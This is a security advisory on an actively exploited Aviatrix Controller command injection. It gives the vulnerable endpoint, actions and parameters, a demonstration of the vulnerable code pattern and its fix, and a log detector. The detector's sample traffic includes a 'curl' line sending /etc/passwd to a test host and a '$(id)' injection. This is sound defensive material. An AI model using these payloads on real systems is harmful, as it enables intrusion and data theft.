Actively Exploited in the Wild

This vulnerability is being actively exploited in the wild.

Aviatrix Controller Command Injection Vulnerability Allowing Remote Code Execution

Vulnerability

A command injection vulnerability has been identified in Aviatrix Controller 7.1 releases before 7.1.4191 and 7.2 releases before 7.2.4996. User-controlled API parameters are incorporated into commands executed by the controller without adequate sanitization, so an unauthenticated attacker can execute arbitrary commands on the server. Exploitation consists of sending shell metacharacters (for example ';', '|', '&&' or '$(...)') in specific API parameters: the values pass the controller's command validation, and the shell then interprets the metacharacters, appending the attacker's payload to the command that is executed.
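The bug class in miniature, as an added example that is not Aviatrix's code and makes no claim about how the controller actually builds its commands: a hypothetical helper receives the cloud_type value, first spliced into a shell string (the vulnerable pattern) and then passed as an argv element behind an allowlist (the hardened pattern). The allowlist of numeric cloud IDs and the use of echo as the invoked helper are assumptions made for illustration.

```python
import subprocess

# Constructed illustration of the bug class described above; this is not
# Aviatrix's code. The "helper" being invoked is just echo, so the example
# runs anywhere with a POSIX shell.

ALLOWED_CLOUD_TYPES = {"1", "4", "8", "16"}  # assumption: cloud_type is a small numeric ID


def run_vulnerable(cloud_type: str) -> str:
    """Attacker input is spliced into a shell string, so ';', '|', '&&',
    '$(...)' and backticks are parsed by /bin/sh instead of being passed as data."""
    cmd = f"echo cloud_type={cloud_type}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_no_shell(cloud_type: str) -> str:
    """Same helper invoked through an argv list: no shell is involved, so the
    whole value reaches echo as one literal argument, metacharacters included."""
    argv = ["echo", f"cloud_type={cloud_type}"]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def run_hardened(cloud_type: str) -> str:
    """Defence in depth: reject anything outside the allowlist, then avoid the shell.
    (If a shell is truly unavoidable, shlex.quote() the value as a last resort.)"""
    if cloud_type not in ALLOWED_CLOUD_TYPES:
        raise ValueError(f"rejected cloud_type: {cloud_type!r}")
    return run_no_shell(cloud_type)


def injected_marker_ran(output: str) -> bool:
    """True only if the injected 'echo INJECTED' executed as a command of its own,
    i.e. INJECTED appears on a line by itself rather than inside the echoed value."""
    return "INJECTED" in output.splitlines()


if __name__ == "__main__":
    payload = "1; echo INJECTED"
    print(repr(run_vulnerable(payload)), injected_marker_ran(run_vulnerable(payload)))
    print(repr(run_no_shell(payload)), injected_marker_ran(run_no_shell(payload)))
    try:
        run_hardened(payload)
    except ValueError as err:
        print(err)
```

The allowlist is the fix the advisory describes (input validation); the argv form is the defence that holds even when validation is later loosened, because there is no shell left to interpret the metacharacters.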

Impact

Exploitation of this vulnerability allows unauthenticated users to execute arbitrary commands on the affected Aviatrix Controller instance.

Reproduction

To reproduce, send a POST request to the '/v1/api' endpoint with the 'action' parameter set to 'list_flightpath_destination_instances' or 'flightpath_connection_test' and place the payload in the 'cloud_type' or 'src_cloud_type' parameter. Shell metacharacters in that value are interpreted on the server, so the injected command runs on the controller; a typical proof of concept sends the contents of a sensitive file such as '/etc/passwd' to a host controlled by the attacker. When testing your own deployment, prefer a benign out-of-band callback (a DNS or HTTP request to a host you control) over exfiltrating real data, and record the test window so the resulting requests are not mistaken for an attack.
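Detection logic for the request pattern above, added here as an example rather than taken from the page or from Aviatrix: it parses form-encoded POST bodies sent to /v1/api, flags shell metacharacters in cloud_type or src_cloud_type, and rates hits on the two named actions higher than hits on other actions. The request tuples are constructed samples (with TEST-NET addresses), and form encoding of the body is an assumption; adapt the parsing if your proxy or WAF logs bodies in another form.

```python
import re
from urllib.parse import parse_qs

# Actions named in the advisory; metacharacters in other actions are still
# reported, but at lower severity.
TARGET_ACTIONS = {"list_flightpath_destination_instances", "flightpath_connection_test"}
WATCHED_PARAMS = ("cloud_type", "src_cloud_type")
# Characters a POSIX shell treats as syntax; a numeric cloud ID never needs any of them.
SHELL_META = re.compile(r"[;&|`$<>\n(){}]")


def inspect_request(method: str, path: str, body: str) -> list:
    """Return one finding per watched parameter value that contains shell syntax."""
    if method != "POST" or path != "/v1/api":
        return []
    # parse_qs percent-decodes values, so %3B is seen as ';' and %24 as '$'.
    params = parse_qs(body, keep_blank_values=True)
    action = params.get("action", [""])[0]
    findings = []
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if SHELL_META.search(value):
                findings.append({
                    "action": action,
                    "param": name,
                    "value": value,
                    "severity": "high" if action in TARGET_ACTIONS else "low",
                })
    return findings


def scan(requests) -> list:
    """requests: iterable of (src_ip, method, path, body) tuples."""
    results = []
    for src_ip, method, path, body in requests:
        for finding in inspect_request(method, path, body):
            results.append({**finding, "src": src_ip})
    return results


# Constructed sample traffic (assumption: bodies are application/x-www-form-urlencoded).
SAMPLE_REQUESTS = [
    ("198.51.100.7", "POST", "/v1/api",
     "action=list_flightpath_destination_instances&cloud_type=1&CID=abc"),          # benign
    ("203.0.113.10", "POST", "/v1/api",
     "action=flightpath_connection_test&src_cloud_type=1%3Bcurl+-d+%40%2Fetc%2Fpasswd"
     "+http%3A%2F%2F203.0.113.10%2F&dst_cloud_type=4"),                              # exfil attempt
    ("203.0.113.11", "POST", "/v1/api",
     "action=list_flightpath_destination_instances&cloud_type=1%24(id)"),            # $(id)
    ("203.0.113.12", "POST", "/v1/api",
     "action=get_controller_version&cloud_type=1%3Bid"),                             # other action
    ("198.51.100.8", "GET", "/", ""),                                                # not the API
]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(f"{hit['severity']:<4} {hit['src']:<14} {hit['action']} {hit['param']}={hit['value']!r}")
```

The regex is deliberately broad: a legitimate cloud_type is a short identifier, so any shell syntax in it is worth an alert, and false positives are cheap next to a missed pre-auth RCE.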

Remediation

Update Aviatrix Controller to 7.1.4191 or 7.2.4996 (or a later release of the same branch). After updating, review the Controller IP Access settings so that port 443 is reachable only from trusted source addresses and is not exposed to the Internet; this limits who can reach the API at all. Because the vulnerability is being exploited in the wild, treat any controller that was Internet-reachable before patching as potentially compromised and review it for unexpected processes, accounts or outbound connections before trusting it again.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread           0.3
impact           7.5
exploitability   9.4
remediation      7.9
relevance        0.0
threat           9.9
urgency          2.9
incentive       10.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.